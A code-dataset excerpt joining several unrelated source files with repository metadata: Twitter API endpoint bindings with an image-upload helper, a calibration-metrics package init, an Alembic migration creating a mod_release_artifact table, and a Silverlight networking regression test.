""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-show
:allowed_param: 'source_id', 'source_screen_name', 'target_id',
'target_screen_name'
"""
return bind_api(
api=self,
path='/friendships/show.json',
payload_type='friendship',
allowed_param=['source_id', 'source_screen_name',
'target_id', 'target_screen_name']
)
def lookup_friendships(self, user_ids=None, screen_names=None):
""" Perform bulk look up of friendships from user ID or screenname """
return self._lookup_friendships(list_to_csv(user_ids),
list_to_csv(screen_names))
@property
def _lookup_friendships(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-lookup
:allowed_param: 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/friendships/lookup.json',
payload_type='relationship', payload_list=True,
allowed_param=['user_id', 'screen_name'],
require_auth=True
)
@property
def friends_ids(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friends-ids
:allowed_param: 'id', 'user_id', 'screen_name', 'cursor'
"""
return bind_api(
api=self,
path='/friends/ids.json',
payload_type='ids',
allowed_param=['id', 'user_id', 'screen_name', 'cursor']
)
@property
def friends(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friends-list
:allowed_param: 'id', 'user_id', 'screen_name', 'cursor', 'count',
'skip_status', 'include_user_entities'
"""
return bind_api(
api=self,
path='/friends/list.json',
payload_type='user', payload_list=True,
allowed_param=['id', 'user_id', 'screen_name', 'cursor', 'count',
'skip_status', 'include_user_entities']
)
@property
def friendships_incoming(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-incoming
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/friendships/incoming.json',
payload_type='ids',
allowed_param=['cursor']
)
@property
def friendships_outgoing(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-outgoing
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/friendships/outgoing.json',
payload_type='ids',
allowed_param=['cursor']
)
@property
def followers_ids(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-followers-ids
:allowed_param: 'id', 'user_id', 'screen_name', 'cursor', 'count'
"""
return bind_api(
api=self,
path='/followers/ids.json',
payload_type='ids',
allowed_param=['id', 'user_id', 'screen_name', 'cursor', 'count']
)
@property
def followers(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-followers-list
:allowed_param: 'id', 'user_id', 'screen_name', 'cursor', 'count',
'skip_status', 'include_user_entities'
"""
return bind_api(
api=self,
path='/followers/list.json',
payload_type='user', payload_list=True,
allowed_param=['id', 'user_id', 'screen_name', 'cursor', 'count',
'skip_status', 'include_user_entities']
)
@property
def get_settings(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/get-account-settings """
return bind_api(
api=self,
path='/account/settings.json',
payload_type='json',
use_cache=False
)
@property
def set_settings(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-settings
:allowed_param: 'sleep_time_enabled', 'start_sleep_time',
'end_sleep_time', 'time_zone',
'trend_location_woeid',
'allow_contributor_request', 'lang'
"""
return bind_api(
api=self,
path='/account/settings.json',
method='POST',
payload_type='json',
allowed_param=['sleep_time_enabled', 'start_sleep_time',
'end_sleep_time', 'time_zone',
'trend_location_woeid',
'allow_contributor_request', 'lang'],
use_cache=False
)
def verify_credentials(self, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/get-account-verify_credentials
:allowed_param: 'include_entities', 'skip_status', 'include_email'
"""
if 'include_email' in kwargs:
kwargs['include_email'] = str(kwargs['include_email']).lower()
try:
return bind_api(
api=self,
path='/account/verify_credentials.json',
payload_type='user',
require_auth=True,
allowed_param=['include_entities', 'skip_status',
'include_email'],
)(**kwargs)
except TweepError as e:
if e.response is not None and e.response.status_code == 401:
return False
raise
@property
def rate_limit_status(self):
""" :reference: https://developer.twitter.com/en/docs/developer-utilities/rate-limit-status/api-reference/get-application-rate_limit_status
:allowed_param: 'resources'
"""
return bind_api(
api=self,
path='/application/rate_limit_status.json',
payload_type='json',
allowed_param=['resources'],
use_cache=False
)
def update_profile_image(self, filename, file_=None):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-update_profile_image
:allowed_param: 'include_entities', 'skip_status'
"""
headers, post_data = API._pack_image(filename, 700, f=file_)
return bind_api(
api=self,
path='/account/update_profile_image.json',
method='POST',
payload_type='user',
allowed_param=['include_entities', 'skip_status'],
require_auth=True
)(self, post_data=post_data, headers=headers)
def update_profile_background_image(self, filename, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-update_profile_background_image
:allowed_param: 'tile', 'include_entities', 'skip_status', 'use'
"""
f = kwargs.pop('file', None)
headers, post_data = API._pack_image(filename, 800, f=f)
return bind_api(
api=self,
path='/account/update_profile_background_image.json',
method='POST',
payload_type='user',
allowed_param=['tile', 'include_entities', 'skip_status', 'use'],
require_auth=True
)(post_data=post_data, headers=headers)
def update_profile_banner(self, filename, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-update_profile_banner
:allowed_param: 'width', 'height', 'offset_left', 'offset_right'
"""
f = kwargs.pop('file', None)
headers, post_data = API._pack_image(filename, 700,
form_field='banner', f=f)
return bind_api(
api=self,
path='/account/update_profile_banner.json',
method='POST',
allowed_param=['width', 'height', 'offset_left', 'offset_right'],
require_auth=True
)(post_data=post_data, headers=headers)
@property
def update_profile(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-update_profile
:allowed_param: 'name', 'url', 'location', 'description',
'profile_link_color'
"""
return bind_api(
api=self,
path='/account/update_profile.json',
method='POST',
payload_type='user',
allowed_param=['name', 'url', 'location', 'description',
'profile_link_color'],
require_auth=True
)
@property
def favorites(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-favorites-list
:allowed_param: 'screen_name', 'user_id', 'max_id', 'count',
'since_id', 'max_id'
"""
return bind_api(
api=self,
path='/favorites/list.json',
payload_type='status', payload_list=True,
allowed_param=['screen_name', 'user_id', 'max_id', 'count',
'since_id', 'max_id']
)
@property
def create_favorite(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-favorites-create
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/favorites/create.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def destroy_favorite(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-favorites-destroy
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/favorites/destroy.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def create_block(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-blocks-create
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/blocks/create.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def destroy_block(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-blocks-destroy
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/blocks/destroy.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def mutes_ids(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/get-mutes-users-ids
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/mutes/users/ids.json',
payload_type='ids',
allowed_param=['cursor'],
require_auth=True
)
@property
def mutes(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/get-mutes-users-list
:allowed_param: 'cursor', 'include_entities', 'skip_status'
"""
return bind_api(
api=self,
path='/mutes/users/list.json',
payload_type='user', payload_list=True,
allowed_param=['cursor', 'include_entities', 'skip_status'],
require_auth=True
)
@property
def create_mute(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-mutes-users-create
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/mutes/users/create.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def destroy_mute(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-mutes-users-destroy
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/mutes/users/destroy.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def blocks(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/get-blocks-list
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/blocks/list.json',
payload_type='user', payload_list=True,
allowed_param=['cursor'],
require_auth=True
)
@property
def blocks_ids(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/get-blocks-ids
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/blocks/ids.json',
payload_type='ids',
allowed_param=['cursor'],
require_auth=True
)
@property
def report_spam(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-users-report_spam
:allowed_param: 'user_id', 'screen_name', 'perform_block'
"""
return bind_api(
api=self,
path='/users/report_spam.json',
method='POST',
payload_type='user',
allowed_param=['user_id', 'screen_name', 'perform_block'],
require_auth=True
)
@property
def saved_searches(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/get-saved_searches-list """
return bind_api(
api=self,
path='/saved_searches/list.json',
payload_type='saved_search', payload_list=True,
require_auth=True
)
@property
def get_saved_search(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/get-saved_searches-show-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/saved_searches/show/{id}.json',
payload_type='saved_search',
allowed_param=['id'],
require_auth=True
)
@property
def create_saved_search(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-saved_searches-create
:allowed_param: 'query'
"""
return bind_api(
api=self,
path='/saved_searches/create.json',
method='POST',
payload_type='saved_search',
allowed_param=['query'],
require_auth=True
)
@property
def destroy_saved_search(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-saved_searches-destroy-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/saved_searches/destroy/{id}.json',
method='POST',
payload_type='saved_search',
allowed_param=['id'],
require_auth=True
)
@property
def create_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-create
:allowed_param: 'name', 'mode', 'description'
"""
return bind_api(
api=self,
path='/lists/create.json',
method='POST',
payload_type='list',
allowed_param=['name', 'mode', 'description'],
require_auth=True
)
@property
def destroy_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-destroy
:allowed_param: 'owner_screen_name', 'owner_id', 'list_id', 'slug'
"""
return bind_api(
api=self,
path='/lists/destroy.json',
method='POST',
payload_type='list',
allowed_param=['owner_screen_name', 'owner_id', 'list_id', 'slug'],
require_auth=True
)
@property
def update_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-update
:allowed_param: 'list_id', 'slug', 'name', 'mode', 'description',
'owner_screen_name', 'owner_id'
"""
return bind_api(
api=self,
path='/lists/update.json',
method='POST',
payload_type='list',
allowed_param=['list_id', 'slug', 'name', 'mode', 'description',
'owner_screen_name', 'owner_id'],
require_auth=True
)
@property
def lists_all(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-list
:allowed_param: 'screen_name', 'user_id', 'reverse'
"""
return bind_api(
api=self,
path='/lists/list.json',
payload_type='list', payload_list=True,
allowed_param=['screen_name', 'user_id', 'reverse'],
require_auth=True
)
@property
def lists_memberships(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-memberships
:allowed_param: 'screen_name', 'user_id', 'filter_to_owned_lists',
'cursor', 'count'
"""
return bind_api(
api=self,
path='/lists/memberships.json',
payload_type='list', payload_list=True,
allowed_param=['screen_name', 'user_id', 'filter_to_owned_lists',
'cursor', 'count'],
require_auth=True
)
@property
def lists_subscriptions(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-subscriptions
:allowed_param: 'screen_name', 'user_id', 'cursor', 'count'
"""
return bind_api(
api=self,
path='/lists/subscriptions.json',
payload_type='list', payload_list=True,
allowed_param=['screen_name', 'user_id', 'cursor', 'count'],
require_auth=True
)
@property
def list_timeline(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-statuses
:allowed_param: 'owner_screen_name', 'slug', 'owner_id', 'list_id',
'since_id', 'max_id', 'count', 'include_entities',
'include_rts'
"""
return bind_api(
api=self,
path='/lists/statuses.json',
payload_type='status', payload_list=True,
allowed_param=['owner_screen_name', 'slug', 'owner_id', 'list_id',
'since_id', 'max_id', 'count', 'include_entities',
'include_rts']
)
@property
def get_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-show
:allowed_param: 'owner_screen_name', 'owner_id', 'slug', 'list_id'
"""
return bind_api(
api=self,
path='/lists/show.json',
payload_type='list',
allowed_param=['owner_screen_name', 'owner_id', 'slug', 'list_id']
)
@property
def add_list_member(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-members-create
:allowed_param: 'screen_name', 'user_id', 'owner_screen_name',
'owner_id', 'slug', 'list_id'
"""
return bind_api(
api=self,
path='/lists/members/create.json',
method='POST',
payload_type='list',
allowed_param=['screen_name', 'user_id', 'owner_screen_name',
'owner_id', 'slug', 'list_id'],
require_auth=True
)
@property
def remove_list_member(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-members-destroy
:allowed_param: 'screen_name', 'user_id', 'owner_screen_name',
'owner_id', 'slug', 'list_id'
"""
return bind_api(
api=self,
path='/lists/members/destroy.json',
method='POST',
payload_type='list',
allowed_param=['screen_name', 'user_id', 'owner_screen_name',
'owner_id', 'slug', 'list_id'],
require_auth=True
)
def add_list_members(self, screen_name=None, user_id=None, slug=None,
list_id=None, owner_id=None, owner_screen_name=None):
""" Perform bulk add of list members from user ID or screenname """
return self._add_list_members(list_to_csv(screen_name),
list_to_csv(user_id), slug, list_id,
owner_id, owner_screen_name)
@property
def _add_list_members(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-members-create_all
:allowed_param: 'screen_name', 'user_id', 'slug', 'list_id',
'owner_id', 'owner_screen_name'
"""
return bind_api(
api=self,
path='/lists/members/create_all.json',
method='POST',
payload_type='list',
allowed_param=['screen_name', 'user_id', 'slug', 'list_id',
'owner_id', 'owner_screen_name'],
require_auth=True
)
def remove_list_members(self, screen_name=None, user_id=None, slug=None,
list_id=None, owner_id=None,
owner_screen_name=None):
""" Perform bulk remove of list members from user ID or screenname """
return self._remove_list_members(list_to_csv(screen_name),
list_to_csv(user_id), slug, list_id,
owner_id, owner_screen_name)
@property
def _remove_list_members(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-members-destroy_all
:allowed_param: 'screen_name', 'user_id', 'slug', 'list_id',
'owner_id', 'owner_screen_name'
"""
return bind_api(
api=self,
path='/lists/members/destroy_all.json',
method='POST',
payload_type='list',
allowed_param=['screen_name', 'user_id', 'slug', 'list_id',
'owner_id', 'owner_screen_name'],
require_auth=True
)
@property
def list_members(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-members
:allowed_param: 'owner_screen_name', 'slug', 'list_id', 'owner_id',
'cursor'
"""
return bind_api(
api=self,
path='/lists/members.json',
payload_type='user', payload_list=True,
allowed_param=['owner_screen_name', 'slug', 'list_id', 'owner_id',
'cursor']
)
@property
def show_list_member(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-members-show
:allowed_param: 'list_id', 'slug', 'user_id', 'screen_name',
'owner_screen_name', 'owner_id'
"""
return bind_api(
api=self,
path='/lists/members/show.json',
payload_type='user',
allowed_param=['list_id', 'slug', 'user_id', 'screen_name',
'owner_screen_name', 'owner_id']
)
@property
def subscribe_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-subscribers-create
:allowed_param: 'owner_screen_name', 'slug', 'owner_id', 'list_id'
"""
return bind_api(
api=self,
path='/lists/subscribers/create.json',
method='POST',
payload_type='list',
allowed_param=['owner_screen_name', 'slug', 'owner_id', 'list_id'],
require_auth=True
)
@property
def unsubscribe_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-subscribers-destroy
:allowed_param: 'owner_screen_name', 'slug', 'owner_id', 'list_id'
"""
return bind_api(
api=self,
path='/lists/subscribers/destroy.json',
method='POST',
payload_type='list',
allowed_param=['owner_screen_name', 'slug', 'owner_id', 'list_id'],
require_auth=True
)
@property
def list_subscribers(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-subscribers
:allowed_param: 'owner_screen_name', 'slug', 'owner_id', 'list_id',
'cursor', 'count', 'include_entities',
'skip_status'
"""
return bind_api(
api=self,
path='/lists/subscribers.json',
payload_type='user', payload_list=True,
allowed_param=['owner_screen_name', 'slug', 'owner_id', 'list_id',
'cursor', 'count', 'include_entities',
'skip_status']
)
@property
def show_list_subscriber(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-subscribers-show
:allowed_param: 'owner_screen_name', 'slug', 'screen_name',
'owner_id', 'list_id', 'user_id'
"""
return bind_api(
api=self,
path='/lists/subscribers/show.json',
payload_type='user',
allowed_param=['owner_screen_name', 'slug', 'screen_name',
'owner_id', 'list_id', 'user_id']
)
@property
def trends_available(self):
""" :reference: https://developer.twitter.com/en/docs/trends/locations-with-trending-topics/api-reference/get-trends-available """
return bind_api(
api=self,
path='/trends/available.json',
payload_type='json'
)
@property
def trends_place(self):
""" :reference: https://developer.twitter.com/en/docs/trends/trends-for-location/api-reference/get-trends-place
:allowed_param: 'id', 'exclude'
"""
return bind_api(
api=self,
path='/trends/place.json',
payload_type='json',
allowed_param=['id', 'exclude']
)
@property
def trends_closest(self):
""" :reference: https://developer.twitter.com/en/docs/trends/locations-with-trending-topics/api-reference/get-trends-closest
:allowed_param: 'lat', 'long'
"""
return bind_api(
api=self,
path='/trends/closest.json',
payload_type='json',
allowed_param=['lat', 'long']
)
@property
def search(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/search/api-reference/get-search-tweets
:allowed_param: 'q', 'lang', 'locale', 'since_id', 'geocode',
'max_id', 'until', 'result_type', 'count',
'include_entities'
"""
return bind_api(
api=self,
path='/search/tweets.json',
payload_type='search_results',
allowed_param=['q', 'lang', 'locale', 'since_id', 'geocode',
'max_id', 'until', 'result_type', 'count',
'include_entities']
)
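# Usage sketch (query invented): page through recent results with Cursor:
#
# for status in tweepy.Cursor(api.search, q='#python', count=100).items(300):
#     print(status.text)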
@pagination(mode='next')
def search_30_day(self, environment_name, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/search/api-reference/premium-search
:allowed_param: 'query', 'tag', 'fromDate', 'toDate', 'maxResults',
'next'
"""
return bind_api(
api=self,
path='/tweets/search/30day/{}.json'.format(environment_name),
payload_type='status', payload_list=True,
allowed_param=['query', 'tag', 'fromDate', 'toDate', 'maxResults',
'next'],
require_auth=True
)(*args, **kwargs)
@pagination(mode='next')
def search_full_archive(self, environment_name, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/search/api-reference/premium-search
:allowed_param: 'query', 'tag', 'fromDate', 'toDate', 'maxResults',
'next'
"""
return bind_api(
api=self,
path='/tweets/search/fullarchive/{}.json'.format(environment_name),
payload_type='status', payload_list=True,
allowed_param=['query', 'tag', 'fromDate', 'toDate', 'maxResults',
'next'],
require_auth=True
)(*args, **kwargs)
@property
def reverse_geocode(self):
""" :reference: https://developer.twitter.com/en/docs/geo/places-near-location/api-reference/get-geo-reverse_geocode
:allowed_param: 'lat', 'long', 'accuracy', 'granularity',
'max_results'
"""
return bind_api(
api=self,
path='/geo/reverse_geocode.json',
payload_type='place', payload_list=True,
allowed_param=['lat', 'long', 'accuracy', 'granularity',
'max_results']
)
@property
def geo_id(self):
""" :reference: https://developer.twitter.com/en/docs/geo/place-information/api-reference/get-geo-id-place_id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/geo/id/{id}.json',
payload_type='place',
allowed_param=['id']
)
@property
def geo_search(self):
""" :reference: https://developer.twitter.com/en/docs/geo/places-near-location/api-reference/get-geo-search
:allowed_param: 'lat', 'long', 'query', 'ip', 'granularity',
'accuracy', 'max_results', 'contained_within'
"""
return bind_api(
api=self,
path='/geo/search.json',
payload_type='place', payload_list=True,
allowed_param=['lat', 'long', 'query', 'ip', 'granularity',
'accuracy', 'max_results', 'contained_within']
)
@property
def geo_similar_places(self):
""" :reference: https://dev.twitter.com/rest/reference/get/geo/similar_places
        :allowed_param: 'lat', 'long', 'name', 'contained_within'
"""
return bind_api(
api=self,
path='/geo/similar_places.json',
payload_type='place', payload_list=True,
allowed_param=['lat', 'long', 'name', 'contained_within']
)
@property
def supported_languages(self):
""" :reference: https://developer.twitter.com/en/docs/developer-utilities/supported-languages/api-reference/get-help-languages """
return bind_api(
api=self,
path='/help/languages.json',
payload_type='json',
require_auth=True
)
@property
def configuration(self):
""" :reference: https://developer.twitter.com/en/docs/developer-utilities/configuration/api-reference/get-help-configuration """
return bind_api(
api=self,
path='/help/configuration.json',
payload_type='json',
require_auth=True
)
""" Internal use only """
@staticmethod
def _pack_image(filename, max_size, form_field='image', f=None, file_type=None):
"""Pack image from file into multipart-formdata post body"""
        # image must be smaller than max_size KB
if f is None:
try:
if os.path.getsize(filename) > (max_size * 1024):
raise TweepError('File is too big, must be less than %skb.'
% max_size)
except os.error as e:
raise TweepError('Unable to access file: %s' % e.strerror)
            # build the multipart-formdata body
fp = open(filename, 'rb')
else:
f.seek(0, 2) # Seek to end of file
if f.tell() > (max_size * 1024):
raise TweepError('File is too big, must be less than %skb.'
% max_size)
f.seek(0) # Reset to beginning of file
fp = f
# image must be gif, jpeg, png, webp
if not file_type:
file_type = imghdr.what(filename) or mimetypes.guess_type(filename)[0]
if file_type is None:
raise TweepError('Could not determine file type')
if file_type in ['gif', 'jpeg', 'png', 'webp']:
file_type = 'image/' + file_type
        elif file_type not in ['image/gif', 'image/jpeg', 'image/png', 'image/webp']:
raise TweepError('Invalid file type for image: %s' % file_type)
if isinstance(filename, six.text_type):
filename = filename.encode('utf-8')
BOUNDARY = b'Tw3ePy'
body = []
body.append(b'--' + BOUNDARY)
body.append('Content-Disposition: form-data; name="{0}";'
' filename="{1}"'.format(form_field, filename)
.encode('utf-8'))
body.append('Content-Type: {0}'.format(file_type).encode('utf-8'))
body.append(b'')
body.append(fp.read())
body.append(b'--' + BOUNDARY + b'--')
body.append(b'')
fp.close()
body = b'\r\n'.join(body)
# build headers
headers = {
'Content-Type': 'multipart/form-data; boundary=Tw3ePy',
'Content-Length': str(len(body))
}
return headers, body
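# --- Editor's usage sketch (illustrative; not part of the original module) ---
# Assuming an authenticated handle such as `api = tweepy.API(auth)`, the bound
# endpoints above are called like ordinary methods, with keyword arguments
# drawn from each binding's allowed_param list:
#
#     results = api.search(q='python', count=10)
#     trends = api.trends_place(id=1)   # WOEID 1 == worldwide
#     langs = api.supported_languages()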
| 39.766001 | 163 | 0.562461 |
4a2599ec80382411ffca42f201b08226ae28e28a | 329 | py | Python | explicalib/calibration/evaluation/metrics/confidence/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | ["MIT"] | 2 | 2021-11-30T18:44:11.000Z | 2021-11-30T18:44:19.000Z | explicalib/calibration/evaluation/metrics/confidence/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | ["MIT"] | null | null | null | explicalib/calibration/evaluation/metrics/confidence/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
"""
@author: nicolas.posocco
"""
# confidence_ece estimators
from .direct_confidence_ece import direct_confidence_ece
from .confidence_ece import confidence_ece
from .confidence_ece_a import confidence_ece_a
from .confidence_ece_c import confidence_ece_c
from .confidence_ece_ac import confidence_ece_ac
| 27.416667 | 56 | 0.826748 |
4a259b65c4db659f5f5954fde7d473bb52213eba | 1,852 | py | Python | alembic/versions/28df99db32ca_create_mod_release_artifact_table.py | modist-io/modist-api | 827d4b1962caee9a2fde1470df30d8fd60f8f998 | ["0BSD"] | 1 | 2021-01-03T00:20:07.000Z | 2021-01-03T00:20:07.000Z | alembic/versions/28df99db32ca_create_mod_release_artifact_table.py | modist-io/modist-api | 827d4b1962caee9a2fde1470df30d8fd60f8f998 | ["0BSD"] | null | null | null | alembic/versions/28df99db32ca_create_mod_release_artifact_table.py | modist-io/modist-api | 827d4b1962caee9a2fde1470df30d8fd60f8f998 | ["0BSD"] | null | null | null |
"""Create mod_release_artifact table.
Revision ID: 28df99db32ca
Revises: 8e07c57c53c1
Create Date: 2020-04-15 18:12:20.554994
"""
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
from alembic import op
# revision identifiers, used by Alembic.
revision = "28df99db32ca"
down_revision = "8e07c57c53c1"
branch_labels = None
depends_on = None
def upgrade():
"""Pushes changes into the database."""
op.create_table(
"mod_release_artifact",
sa.Column(
"id",
postgresql.UUID(as_uuid=True),
server_default=sa.text("uuid_generate_v4()"),
nullable=False,
),
sa.Column(
"created_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=False,
),
sa.Column(
"updated_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=False,
),
sa.Column("is_active", sa.Boolean(), server_default="true", nullable=False),
sa.Column("name", sa.Text(), nullable=False),
sa.Column("path", sa.Text(), nullable=False),
sa.Column("size", sa.Integer(), nullable=False),
sa.Column("mimetype", sa.Text(), nullable=False),
sa.Column("checksum", sa.String(length=64), nullable=False),
sa.Column("mod_release_id", postgresql.UUID(as_uuid=True), nullable=False),
sa.ForeignKeyConstraint(
["mod_release_id"], ["mod_release.id"], ondelete="cascade"
),
sa.PrimaryKeyConstraint("id"),
)
op.create_refresh_updated_at_trigger("mod_release_artifact")
def downgrade():
"""Reverts changes performed by upgrade()."""
op.drop_refresh_updated_at_trigger("mod_release_artifact")
op.drop_table("mod_release_artifact")
| 29.396825 | 84 | 0.62635 |
4a259b9b1ba7f3d0ababf401245ce6f4f79f382d | 2,175 | py | Python | Src/Hosts/Silverlight/Tests/tests/regressions/test_net.py | jdhardy/dlr | dca078fbf9d103fad4dcabda76795a23d82106bc | ["Apache-2.0"] | null | null | null | Src/Hosts/Silverlight/Tests/tests/regressions/test_net.py | jdhardy/dlr | dca078fbf9d103fad4dcabda76795a23d82106bc | ["Apache-2.0"] | null | null | null | Src/Hosts/Silverlight/Tests/tests/regressions/test_net.py | jdhardy/dlr | dca078fbf9d103fad4dcabda76795a23d82106bc | ["Apache-2.0"] | null | null | null |
from System import Uri, AsyncCallback
from System.IO import StreamReader
from System.Net import WebRequest
from System.Windows.Browser import HtmlPage
import time
import unittest
from System.Windows.Threading import Dispatcher
from System.Threading import ManualResetEvent, Thread, ThreadStart
are = ManualResetEvent(False)
TEST_NET_CONTENT = '[[[CONTENT OF TEST_NET.TXT]]]'
def puts(*a):
print(a)
def web_request(obj, uri_string, func):
req = WebRequest.Create(Uri(uri_string))
req.BeginGetResponse(AsyncCallback(web_complete(obj, func)), req)
def web_complete(obj, func):
def __web_complete(a):
req = a.AsyncState
res = req.EndGetResponse(a)
content = StreamReader(res.GetResponseStream()).ReadToEnd()
func(content)
are.Set()
return __web_complete
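# --- Editor's usage sketch (illustrative only) ---
# web_request() pairs a WebRequest with a completion callback; __web_complete
# reads the response body, invokes the callback, and signals the module-level
# `are` event. A caller can therefore block until the response arrives:
#
#     web_request(None, 'http://example.com/data.txt', puts)
#     are.WaitOne(5000)  # wait up to 5 seconds for the callback to fire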
class NetRegression(unittest.TestCase):
def test_net_local(self):
thread = Thread(ThreadStart(self.do_test_net_local))
thread.Start()
are.WaitOne(5000)
def do_test_net_local(self):
HtmlPage.Dispatcher.BeginInvoke(
lambda: web_request(self, Uri(HtmlPage.Document.DocumentUri, 'tests/regressions/fixtures/test_net.txt').ToString(), self.verify_test_net_local)
)
def verify_test_net_local(self, result):
self.assertEqual(result, TEST_NET_CONTENT)
#sl.log_scenario('url on app on different hosts, fails in any case ***')
#CallNet('http://ironpython/silverlight-samples/test_net.txt', False)
#
#sl.log_scenario('url to same app, expect to work on http request')
#CallNet(Uri(HtmlPage.Document.DocumentUri, 'test_net.txt').AbsoluteUri, True)
#
